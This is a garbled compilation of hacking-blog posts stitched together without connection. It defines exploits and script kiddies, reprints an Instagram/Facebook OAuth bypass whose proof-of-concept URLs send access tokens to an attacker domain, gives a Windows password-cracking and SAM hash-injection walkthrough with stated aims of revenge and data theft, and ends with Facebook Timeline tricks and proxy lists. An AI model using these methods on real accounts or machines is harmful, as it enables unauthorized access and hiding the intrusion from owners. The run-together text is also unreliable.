of victim's yahoo account without asking for any password of victim account.

exploit

ExploitsA tool developed by hackers that is used to perform malicious attacks on computer systems. They are usually scripts that are designed to exploit weaknessness in software over a network, most commonly the Internet. Zero-Day is a common type of exploit.Zero-Day ExploitsCalled either Day Zero or Zero-Day,it is an exploit that takes advantage of a security vulnerability on the same day that the vulnerability becomes publicly or generally known. Zero-Day exploits are usually posted by well-known hacker groups. Software companies may issue a security bulletin or advisory when the exploit becomes known, but companies may not be able to offer a patch to fix the vulnerability for some time after.An exploit (from the same word in the French language, meaning"achievement", or"accomplishment") is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerised). This frequently includes such thingsas gaining control of a computer system or allowing privilege escalation or a denial of service attack.There are several methods of classifying exploits. The most common is by how the exploit contacts the vulnerable software. A 'remote exploit' works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A 'local exploit' requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usuallyconsisting of modified servers that send an exploit if accessed with client application. Exploits against client applications may also requiresome interaction with the user and thus may be used in combination with social engineering method. This is the hacker way of getting into computers and websites for stealing data.In computing, an exploit is an attackon a computer system, especially one that takes advantage of a particular vulnerability that the system offers to intruders. Used as a verb, the term refers to the act ofsuccessfully making such an attack.In Exploit another classification is by the action against vulnerable system: unauthorized data access, arbitrary code execution, denial of service.Many crackers (or hackers, if you prefer that term) take pride in keeping tabs of such exploits and post their exploits (and discovered vulnerabilities) on a Web site to share with others.Where an exploit takes advantage of a weakness in an operating system or vended application program, the owners of the system or application issue a "fix" or patch in response. Users of the system orapplication are responsible for obtaining the patch, which can usually be downloaded from the Web. Failure to install a patch for a given problem exposes the user to a security breach. (However, it can be difficult to keep up with all the required patches.)Many exploits are designed to provide superuser-level access to a computer system. However, it is also possible to use several exploits, first to gain low-level access, then to escalate privileges repeatedly until one reaches root.Normally a single exploit can only take advantage of a specific software vulnerability. Often, when an exploit is published, the vulnerability is fixed through a patch and the exploit becomes obsolete for newer versions of the software. This is the reason why some blackhat hackers do not publish their exploits but keep them private to themselves or other crackers. Such exploits are referred to as 'zero day exploits' and to obtain access to such exploits is the primary desire of unskilled attackers, often nicknamed script kiddies.Script KiddieA person, normally someone who isnot technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to targetspecific information or a specific company but rather uses knowledge of a vulnerability to scanthe entire Internet for a victim thatpossesses that vulnerability.The vast majority of the "hacker" underground is made up of people who have only been using computers for a few years and who really know comparatively little about them. These are people, usually kids, who are attracted by the seemingly magical powers that hacking gives them. Since they know so little about computers, they don't really known how to hackthemselves but instead follow recipes or "scripts" developed by real hackers. Most of these scripts are easy-to-use programs whereby the "script-kiddy" simply enters theIP address of the victim.One of the distinguishing features of script-kiddies is that they must have a lot of patience. Because security holes are quickly found andrepaired, most systems will resist most attacks. Therefore, if the script-kiddy is targeting a single system, they have to find a lot of scripts to try against the system before they find one that works. More commonly, the script-kiddies downloads one of the most recentlydeveloped scripts and proceeds to run it against targets all throughout the Internet until they find someone who is vulnerable to that specific script.

hack instagram account

critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)He reported a few issues to Instagram Include OAuth Attacks, But the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar, Then Facebook Security send me a message, They say even that they was unable to fixthis issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,So, first, checked Instagram’s OAuth protocol: (http://instagram.com/developer/authentication/)While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.In addition, redirection was only allowed to go to the owner app domain.Thus, hacker needed to locate someother way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.Block Files FoldersFor example:Allow request:https://apigee.comBlock requests:Redirect_uri=https://www.breaksec.comRedirect_uri=https://a.apigee.com/Redirect_uri=https://apigee.com/x/x.phpRedirect_uri=https://apigee.com/%23,? or any special signAs it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send theaccess_token code to their own domain.For instance:Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.comIn this case, the redirect_uri parameter should allow redirectiononly to my domain (breaksec.com),right? What happens when we change the suffix in the domain to something like:Breaksec.com.mxIn this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).PoC Bypass (Fixed By Facebook Security Team):https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=tokenGame Over.Bug 2.With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).When you use the Instagram app, itcan be integrated with Facebook.For example:When a user wants to upload their Instagram photos to Facebook, theyallow this interaction and integration to take place.Instagram Would like to access yourpublic profile and friend listNir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.This effectively allows the attacker to steal the access_token of any Instagram user,With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.PoC (Facebook Already fixed this issue): https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token

hack admin

Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:1)Sometime we have forgotten our old password and Hint isn't helping out.2)We want to break into someone computer to get the information.3)Just want to take revenge from someone.4)Stealing computer data.Lets, take a deep dive in Cracking Windowspassword and also where these are stored and in which format.SAM file and Password Hashes~Place where these passwords are stored in Hashes:Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:7524248b4d2c9a9eadd3b435c51404eddc5This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File.You can break this hash password fromwww.md5hash.comwww.passcracking.ruSAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.Location of SAM/Hashes:You can find what you're looking for in several locations on a given machine.It can be found on the hard drive in the folder %systemroot%system32config (i-eC:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machineis running. The only account that can access the SAM file during operation is the"System" account.The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)So the two (Some other also) locations of the SAMHashes are:- %systemroot%system32config- In the registry under HKEY_LOCAL_MACHINESAMCracking or Breaking Into Admin Account:How to get Hashes form SAM file?Well, Below are the methods to do so:1)Well, the easiest way to do this is to bootyour target machine to an alternate OS likeNTFSDOSor Linux and just copy the SAM from the %systemroot%system32config folder.It's quick, it's easy, and it's effective. You can get a copy ofNTFSDOSfrom Sysinternals(http://www.sysinternals.com) The regular version ofNTFSDOSis freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.2)You can also get password hashes by using pwdump2 (Google It to get software~ Search at openwall.com). pwdump uses.DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used.3)Import Hashes directly from l0phtcrack,and let them open to you by cracking.Obtained Hashes? Now crack them:Well, as i have said that these can't be reversed but somehow automated famouscracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.1)John the Ripper- John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of allit's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.2)L0phtCrack- Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.Making Your Own Password in Windows:Injecting Password Hashes into the SAM:Easiest ways to gain Administrator privileges on a machine, is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brainlarger than a peanut. Using a utility called "chntpw" by Petter Nordhal-Hagen you caninject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control, just burn the .iso on a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS.Make a USB disk of linux or Windows Live dsik can also work. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then restore the original SAM so that no one willknow that i was hacked.You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).Now we hack Admin Password To verify the user name, by simply typing net user, I get a list of all theuser names on that windows machine. Now, go to the command prompt and enter:cd\cd windows\system32net userIf there are people near you and you don’t want them to see the password you type, enter:net user *E.g. > net user username *> Type a password for the user:> Confirm the password:Another Easy method, Using ophcrack to Hack into Admin Account:Ophcrackis a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.This is a type of offline cracking, Just grab.iso of ophcrack fromhere. Burn it and enjoy using.1.Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.2.Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any 14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.3.Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.4.The Ophcrack LiveCD option allows for completely automatic password recovery.5.LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.6.No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.DownloadI think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.Some security Tips ~ Making strong passwords:Now, You might have come to know that how passwords can be cracked, So there are some tips for you.1)Do not make common passwords like 123456 or the one of your own name.2)Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.3)Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.

how to remove timeline on Facebook

How To Remove Facebook Timelin 1st Method. Step1.First go toFacebook Developer Page. Where you created this app.Then Go to Edit App .Step 2.when you click on edit then you cansee on left corner Delete App. Just click on it .Step 3.Once you click on Delete App then its asking for Delete Confirmation.When You Confirm, then your Timeline will be disabled..Now Enjoy with your old FB profile:)2nd MethodMost of the people are not likedFacbook Timeline,so here we tell you the trick that how can you remove timeline from your facebook account.This trick is available for the Firefoxand Chrome users. I give you the trick for both of these browser users .Remove Facebook Timeline profile in Mozilla Firefox 1. Install the User Agent Switcher extension on your Firefox browser from the link given below.Install >>User Agent Switcher Firefox Extension2. Restart your Firefox browser andclick on the Switcher extension icon.3. Now click on the Internet Explorer option and then select the Internet Explorer 7.4. Visit your Facebook Timeline profile and refresh it to get back the old Facebook profile.Remove Facebook Timeline profile in Google Chrome 1. Make a Right Click on the Chrome browser launcher icon and then click on the Properties.2. Now lick on the Shortcut tab. Copy the code given below according to your requirement.Windows 7 users : –user-agent=”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)”Windows XP users : –user-agent=”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)”3. Paste this code in the Target box at the end of the line (after the chrome.exe)4. Now click on the Apply and then OK.5. Refresh your Facebook profile to get the old Facebook profile back.

proxy server and sites

Proxy servers:-Its allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page onyour behalf, and then sends you theresults. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow. Please see instructions for using a proxy server.There are a variety of types of these proxy servers:*Transparent Proxy-This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, nottransparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.*Anonymous Proxy-This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonableanonymity for most users. This typeof proxy server will hide your IP address.*Distorting Proxy-This type of proxy server identifies itself as a proxy server, but make an incorrectoriginal IP address available through the http headers. This type of proxy server will hide your IP address.*High Anonymity Proxy-This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.>>Proxy browser:-A proxy server acts as a security barrier between your internal network and the Internet, keeping others on the Internet from being able to obtain access to informationthat is located on your internal network.........and your browser is become like invible........its hide your ip. like you use china country proxy den opengoogle.comnow google will open in china language form............!~How to change proxy settingsin Browsers@ Mozilla Firefox1. Open Mozilla Firefox.2. Click on Tools then click on Options….3. Click on the Advance tab, then click on the Network sub-tab and finally on the Settings… button.4. Tick the Manual Proxy Configuration: radio button.5. In the HTTP Proxy: box, type the IP address of the proxy server.6. In the Port: box, type the in the port number that is used by the proxy server.7. Click OK to close the Connection Settings window.8. Click OK to close the Options window.9. DONE@ Internet Explorer1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.2. Under Proxy server, click to select the Use a proxy server for your LAN check box.3. In the Address box, type the IP address of the proxy server.4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer onthe local network (this may speed up performance).6. Click OK to close the LAN Settingsdialog box.7. Click OK again to close the Internet Options dialog box.@ proxy settings InGoogle Chrome.* To change proxy settings: Click"Customize and control Google Chrome" icon right under the"window close" button.* A popup menu will be dipslayed. Click "Options".* Select the "Under the Hood" tab.* Scroll down and Click "change proxy settings" button.* A popup dialog will be display. Select the Connections tab on this dialg.* If you are using LAN, click "LAN Settings" button. If you are using Dial-up or Virtual Private Network connection, select necessary connection and click "Settings" button.* Make sure the "automatically detect proxy settings" and "use a proxy automatic configuration script" options are not checked.* In the "Proxy Server" area, click the check box next to Use a proxy server for this connection.* If nessesary, enable "bypass proxy server for local addresses".* Click the "Advanced" button and set Proxy Server address (proxy IP),proxy server port.* Click OK.*done@ proxy settings in Safari.* To change proxy settings: Open Safari* Click Safari on top of the screen.* Click "Preferences".* In the menu bar at the top of the window, Click "Advanced".* Click on the "Change Settings" button next to the Proxies label* Click on the check box button next to Web Proxy (HTTP)* Enter proxy server and port information* Select "Apply Now" to save settings.* Done.Anti-Spam SMTP Proxy ServerThe Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Browse all files' to download the professional version 2.2.1 build12221.*.Multiple Weighted DNSBLs*.Multiple Weighted URIBLs*.Greylisting*.Weighted Regular Expression Filtering*.Bayesian*.Penalty Box*.SenderBase*.SSL/TLS*.SPF/SRS*.Attachment Blocking*.ClamAV and FileScan*.Blocking Reporting*.LDAP support*.Backscatter DetectionDownloadWEB PROXY SITES:www.meebo.com/www.iloveim.com/www.the-cloak.com/www.cantblock.mewww.mb35.infowww.cloaking.mewww.proxybrowsing.comwww.behidden.comwww.yourfreedom.netwww.hujiko.comwww.anonymizer.ruwww.schoolproxylists.cn/www.xysurfing.com/www.googlefaker.com/www.internetoxy.com/Facebook ProxyIf Facebook are block in your offices, college and home then don't worry Click at below linkand access your FB Account.EnjoY..!!http://www.f1.proxymice.com/http://www.f2.proxymice.com/http://www.f3.proxymice.com/